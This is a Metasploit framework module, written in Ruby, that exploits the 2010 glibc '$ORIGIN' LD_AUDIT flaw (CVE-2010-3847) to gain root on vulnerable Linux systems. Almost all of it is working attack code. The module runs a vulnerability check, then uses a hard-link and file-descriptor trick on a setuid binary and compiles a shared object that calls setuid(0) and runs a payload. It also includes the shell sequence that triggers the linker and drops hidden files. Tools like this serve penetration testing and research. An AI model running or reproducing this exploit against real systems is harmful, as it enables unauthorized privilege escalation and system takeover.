glibc '$ORIGIN' Expansion Privilege Escalation

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Local::Linux

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "glibc '$ORIGIN' Expansion Privilege Escalation",
        'Description' => %q{
          This module attempts to gain root privileges on Linux systems by abusing
          a vulnerability in the GNU C Library (glibc) dynamic linker.

          glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does not
          properly restrict use of the `LD_AUDIT` environment variable when loading
          setuid executables which allows control over the `$ORIGIN` library search
          path resulting in execution of arbitrary shared objects.

          This module opens a file descriptor to the specified suid executable via
          a hard link, then replaces the hard link with a shared object before
          instructing the linker to execute the file descriptor, resulting in
          arbitrary code execution.

          The specified setuid binary must be readable and located on the same
          file system partition as the specified writable directory.

          This module has been tested successfully on:

          glibc 2.5 on CentOS 5.4 (x86_64);
          glibc 2.5 on CentOS 5.5 (x86_64);
          glibc 2.12 on Fedora 13 (i386); and
          glibc 2.5-49 on RHEL 5.5 (x86_64).

          Some versions of `ld.so`, such as the version shipped with Ubuntu 14,
          hit a failed assertion in `dl_open_worker` causing exploitation to fail.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Tavis Ormandy', # Discovery and exploit
          'bcoles' # Metasploit
        ],
        'DisclosureDate' => '2010-10-18',
        'Platform' => 'linux',
        'Arch' => [ARCH_X86, ARCH_X64],
        'SessionTypes' => ['shell', 'meterpreter'],
        'Targets' => [
          ['Automatic', {}],
          ['Linux x86', { 'Arch' => ARCH_X86 }],
          ['Linux x64', { 'Arch' => ARCH_X64 }]
        ],
        'References' => [
          ['CVE', '2010-3847'],
          ['BID', '44154'],
          ['EDB', '15274'],
          ['URL', 'https://seclists.org/fulldisclosure/2010/Oct/257'],
          ['URL', 'https://www.ubuntu.com/usn/usn-1009-1'],
          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847'],
          ['URL', 'https://access.redhat.com/security/cve/CVE-2010-3847']
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options [
      OptString.new('SUID_EXECUTABLE', [true, 'Path to a suid executable', '/bin/ping'])
    ]
    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir']
  end

  def suid_exe_path
    datastore['SUID_EXECUTABLE']
  end

  def check
    v = Rex::Version.new glibc_version
    return CheckCode::Safe('Could not determine the GNU C library version') if v.eql? ''

    if v >= Rex::Version.new('2.12.2') ||
       (v >= Rex::Version.new('2.11.3') && v < Rex::Version.new('2.12'))
      return CheckCode::Safe("GNU C Library version #{v} is not vulnerable")
    end

    vprint_good "GNU C Library version #{v} appears vulnerable"

    return CheckCode::Safe("#{suid_exe_path} file not found") unless file? suid_exe_path
    return CheckCode::Detected("#{suid_exe_path} is not setuid") unless setuid? suid_exe_path

    vprint_good "#{suid_exe_path} is setuid"

    return CheckCode::Detected("#{suid_exe_path} is not readable") unless readable?(suid_exe_path)

    vprint_good "#{suid_exe_path} is readable"

    CheckCode::Appears
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  def exploit
    check_status = check

    if check_status == CheckCode::Appears
      print_good 'The target appears to be vulnerable'
    elsif check_status == CheckCode::Detected
      fail_with Failure::BadConfig, "#{suid_exe_path} is not suid or not readable"
    else
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    suid_partition = cmd_exec "df -P -- '#{suid_exe_path}' | awk 'NR==2 {print $1}'"
    base_partition = cmd_exec "df -P -- '#{base_dir}' | awk 'NR==2 {print $1}'"
    if suid_partition == base_partition
      vprint_good "'#{suid_exe_path}' and '#{base_dir}' are located on the same partition"
    else
      print_warning "'#{suid_exe_path}' and '#{base_dir}' are not located on the same partition"
    end

    payload_name = ".#{rand_text_alphanumeric 5..10}"
    payload_path = "#{base_dir}/#{payload_name}"

    # Set target
    uname = kernel_hardware
    vprint_status "System architecture is #{uname}"
    if target.name.eql? 'Automatic'
      case uname
      when 'x86_64'
        my_target = targets[2]
      when /x86/, /i\d86/
        my_target = targets[1]
      else
        fail_with Failure::NoTarget, 'Unable to automatically select a target'
      end
    else
      my_target = target
    end
    print_status "Using target: #{my_target.name}"

    cpu = nil
    case my_target['Arch']
    when ARCH_X86
      cpu = Metasm::Ia32.new
    when ARCH_X64
      cpu = Metasm::X86_64.new
    else
      fail_with Failure::NoTarget, 'Target is not compatible'
    end

    # Compile shared object
    so_stub = %|
      extern int setuid(int);
      extern int setgid(int);
      extern int system(const char *__s);

      void init(void) __attribute__((constructor));

      void __attribute__((constructor)) init() {
        setuid(0);
        setgid(0);
        system("#{payload_path}");
      }
    |

    begin
      so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
    rescue StandardError => e
      print_error "Metasm encoding failed: #{$ERROR_INFO}"
      elog('Metasm encoding failed', error: e)
      fail_with Failure::Unknown, 'Metasm encoding failed'
    end

    # Upload shared object
    so_name = ".#{rand_text_alphanumeric 5..10}"
    so_path = "#{base_dir}/#{so_name}"
    upload_and_chmodx so_path, so

    # Upload exploit
    link_name = ".#{rand_text_alphanumeric 5..10}"
    link_path = "#{base_dir}/#{link_name}"
    fd = rand(3..9)
    exp = %(
      rm -rf '#{link_path}'
      mkdir '#{link_path}'
      ln #{suid_exe_path} #{link_path}/#{link_name}
      exec #{fd}< #{link_path}/#{link_name}
      ls -l /proc/$$/fd/#{fd}
      rm -rf '#{link_path}'
      ls -l /proc/$$/fd/#{fd}
      mv #{so_path} #{link_path}
      LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/#{fd}
    )

    exp_name = ".#{rand_text_alphanumeric 5..10}"
    exp_path = "#{base_dir}/#{exp_name}"
    upload_and_chmodx exp_path, exp
    register_file_for_cleanup link_path

    # Upload payload
    upload_and_chmodx payload_path, generate_payload_exe

    # Launch exploit
    print_status 'Launching exploit...'
    # The echo at the end of the command is required
    # else the original session may die
    output = cmd_exec "#{exp_path}& echo "
    output.each_line { |line| vprint_status line.chomp }
  end
end